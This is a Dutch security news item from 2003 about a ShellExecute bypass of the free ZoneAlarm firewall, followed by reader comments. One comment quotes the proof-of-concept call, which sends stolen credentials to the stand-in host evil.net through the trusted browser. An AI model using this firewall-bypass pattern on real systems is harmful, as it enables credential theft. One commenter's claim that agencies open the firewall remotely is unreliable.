VirusAlert.nl logo
  26 juni 2017 Blog | Virusscanner vergelijken | nieuwsbrieven | alerts | links | faqs | partners | adverteren | contact
Titel:
Serieus lek in ZoneAlarm firewall
Rubriek:
Software
Datum:
30 juni 2003
Bron:
(c) 2003, via Security.nl
Bericht:

Een recent bericht op de Bugtraq mailinglist onthulde een serieus lek in het ontwerp van de gratis en zeer populaire firewall ZoneAlarm. Dankzij de Win32 ShellExecute functie in Windows, kan ZoneAlarm zo geconfigureerd worden dat het theoretisch een onbeveiligde Internetverbinding kan openen en zo informatie kan lekken. Doordat het om een fout gaat in het ontwerp van de gratis versie, lijkt de kans op een patch zeer klein. Er zijn echter nog geen meldingen verschenen dat het lek ook misbruikt is

Reactie plaatsen, log dan hier in
Link:
Artikel bij de Register.co.uk
Advertentie:


 Reacties op dit bericht:
reactie door op 1 juli 2003 om 10:42.

Een willekeurig programma geeft een opdracht aan het OS om informatie van of naar een bepaalde server te sturen. Het OS geeft deze informatie vervolgens door aan de browser om de opdracht uit te voeren. De gebruiker van deze PC heeft vervolgens zelf bij de installatie van de firewall aangegeven dat de browser toegang mag hebben tot het netwerk. En omdat de browser en dus niet het (trojan)programma het contact met het netwerk maakt wordt dit door de firewall toegestaan omdat dit door de gebruiker zo is ingesteld of tot de default instellingen behoord.

Dit lijkt me toch niet echt een fout in ZoneAlarm maar meer een taak voor een virusscanner met een "unwanted programs" detectie zoals de McAfee virusscanner.

De taak van een firewall is immers de poorten van de pc te bewaken en het verkeer dat daar door gaat.

Ik zie dit meer als een gebruikersfout. De gebruiker heeft immers het programma geinstalleerd en ook opgegeven bij de firewall dat de browser toegang met het netwerk mag hebben.

Als de URL bekend is zou je die kunnen blokkeren in de browser of in de firewall.



reactie door op 2 juli 2003 om 12:32.

Waarom hebben ander Firewalls dat probleem niet, en ook de Pro-versie van ZA niet?
Geen gebruikersfout, maar een echt lek in de firewall-software van de Free versie van ZA.

reactie door op 2 juli 2003 om 13:27.

Zoals de melder in het artikel al aangeeft heeft hij alleen de free versie van zonealrm getest maar vermoed zelf dat het bij alle versie van toepassing is. Ik werk zelf met de proversie maar hoef niet eens te testen om te weten dat dit ook daar werkt. Het is geen fout in zonealarm of welke firewall dan ook maar een gebruikers instelleing.

Dit is waar het om gaat:

ShellExecute(
0,
"open",
"http://evil.net/collect.cgiun=stolen_username&pw=stollen_password"
0,
0,
SW_HIDE //This doesn't work.
//I think it is supposed to hide the window but ...
);

En hier kun je de volledige melding lezen.
http://www.securityfocus.com/archive/1/326371/2003-06-24/2003-06-30/2

Iedere firewall kent dit "probleem" totdat de URL handmatig wordt geblokkeerd of de browser de toegang tot internet wordt genomen.

Het is een storm in een glas water.



reactie door op 2 juli 2003 om 15:36.

Enkele replies verder wordt vermeld hoe dit lek simpelweg in ZAP onschadelijk gemaakt kan worden:

Quote
The posting describes test results using older versions of Zone Labs?
ZoneAlarm and also erroneously attributes the problem to a flawed core
design.

Zone Labs? Advanced Program Control feature protects PCs from the
ShellExecute theoretical exploit. This feature is available in all Zone
Labs? advanced consumer security products, as well as Zone Labs?
enterprise security product, Integrity. Advanced Program Control protects
against this theoretical exploit and others which attempt to bypass the
firewall?s trusted application permissions.

Zone Labs recommends that users run Program Control at the
default ?medium? setting for about a week so that the software
will ?learn? each program that is used for Internet access. After a week,
configure Program Control at the high setting. At that point, users will
only be prompted with an Alert if there is a problem. As a result, users
get full protection against the ShellExecute theoretical exploit. Zone
Labs is always working on improving these and other features to make them
easy-to-use and intuitive for all users, no matter their skill level.

Zone Labs first introduced the Advanced Program Control feature in
November, 2002 with the release of ZoneAlarm Pro 3.5. Zone Labs added
this feature to Integrity at the same time and then added it to ZoneAlarm
Plus in February, 2003. Zone Labs recommends that all users keep their
security products up-to-date at all times.

We have continually hardened security in our free ZoneAlarm, as we do with
all our releases, but we do not include all advanced features in this
basic product.

More information can be found through our technical support FAQs.

Te Smith
Sr. Director, Corporate Communications
Zone Labs
tsmith@zonelabs.com
Unquote

Ik gebruik Outpost. Heeft eenzelfde feature met de partially allowed applications.

Dit lek is alleen een lek wanneer je bijvoorbeeld de webbrowser volledige toegang geeft.
URL blokkeren of de webbrowser toegang tot internet ontnemen hoeft niet eens.
Maar dat wisten we eigenlijk al een tijdje.

reactie door op 3 juli 2003 om 11:24.

Een toepassing die van dit gat misbruik wil maken zal toch eerst geinstalleerd moeten worden. Het risico van misbruik is dus het welbekende risico dat de installatie van welk programma dan ook oplevert.
Lijkt mij dus inderdaad de taak van een virusscanner om dit soort programma's te onderscheppen.

reactie door op 4 juli 2003 om 10:38.

Heren,

ik ben leek en hier allemaal niet zo handig in deze zaken daarom een makkelijke prooi, ik zal wel geen uitzondering zijn. Ik heb me laten vertellen dat door het plaatsen van een router het inbreken op een pc niet meer zo gemakkelijk zal zijn is dat wel zo? Ik heb ook gemerkt dat Norton bepaalde virussen niet detecteerd (terwijl ik één keer in de maand aan het upgraden ben), dat je ze toch binnenhaald, en wanneer ze eenmaal binnen hebt de Norton ze niet in quarantaine wil zetten of wil verwijderen, nb ik kan me dan niet herinneren dat ik een programma of bestand heb binnen heb gehaald laatstaan heb geopend.

Groet J jansen.

reactie door op 4 juli 2003 om 13:46.

Uhm...
Dit heeft verder niets met het nieuwsartikel te maken.
Denk dat je de vraag beter bij de helpdesk kunt stellen.

reactie door op 8 juli 2003 om 03:27.

voor dit soort vragen kun je beter naar www.helpmij.nl gaan is een goede forum voor dit soort vagen.

Greetz.


reactie door op 13 juli 2003 om 13:31.

Ik vind dat er wel een oplossing moet komen tegen dit probleem, want ik ken zoveel mensen die deze firewall gebruiken en die zo vaak op internet zitten. Denken mensen eindelijk een goede firewall te hebben, blijkt deze zo lek als een mandje. Ik vind het een schande.

reactie door op 13 juli 2003 om 13:33.

Ik vind dat er wel een oplossing moet komen tegen dit probleem, want ik ken zoveel mensen die deze firewall gebruiken en die zo vaak op internet zitten. Denken mensen eindelijk een goede firewall te hebben, blijkt deze zo lek als een mandje. Ik vind het een schande.

reactie door op 21 juli 2003 om 22:13.

Er hoeft geen oplossing te zijn voor dit probleem. Je bent altijd veilig voor hackers. Denk maar eens na:

vraag: Waarom is het leuk om een systeem te hacken?
antwoord: Omdat het morgen in de kranten staat.

Er zal NOOIT in de krant staan: Fam. Jansen gehacked.
Wel: Microsoft gehacked.

Bedrijven hacken is leuk, die hebben gevoelige info. Wat moet een hacker nou met de e-mailtjes van jou?!?. Saai werk!

reactie door op 12 augustus 2003 om 22:31.

ik ben slachtoffer van deze hack geweest, betreffende firewall software komt er niet meer bij mij op... heb nu een andere firewall, probleem opgelost... gelukkig staan de belangrijke zaken op een PC niet aangesloten op het netwerk, zodat de belangrijke gegevens nooit gehacked kunnen worden welk lek er ook zou zijn....

reactie door op 12 augustus 2003 om 22:34.

nog meer informatie over hetgeen ik eerder melde, pas nadat ik fbi.gov en cia.gov had bezocht merkte ik dat de firewall bepaald verkeer doorliet naar fbi.gov rep. cia.gov, ik vermoede toen al gauw dat de firewall extern open gezet kan worden door bepaalde organisaties die daartoe bevoegd zijn...

reactie door op 16 augustus 2003 om 20:27.

ahHAhaHAHahAH en toen werd je wakker...



 Uw reactie:
U bent niet ingelogd dus kunt niet reageren op dit bericht.


© 2001-2017 VirusAlert.nl. Alle rechten voorbehouden. Disclaimer/PrivacyVirusalert is wordt doorontwikkeld door *Online Marketing Bureau - Springstof Marketing & Zoekmachine Marketing Bureau - Dutch Consultants RSS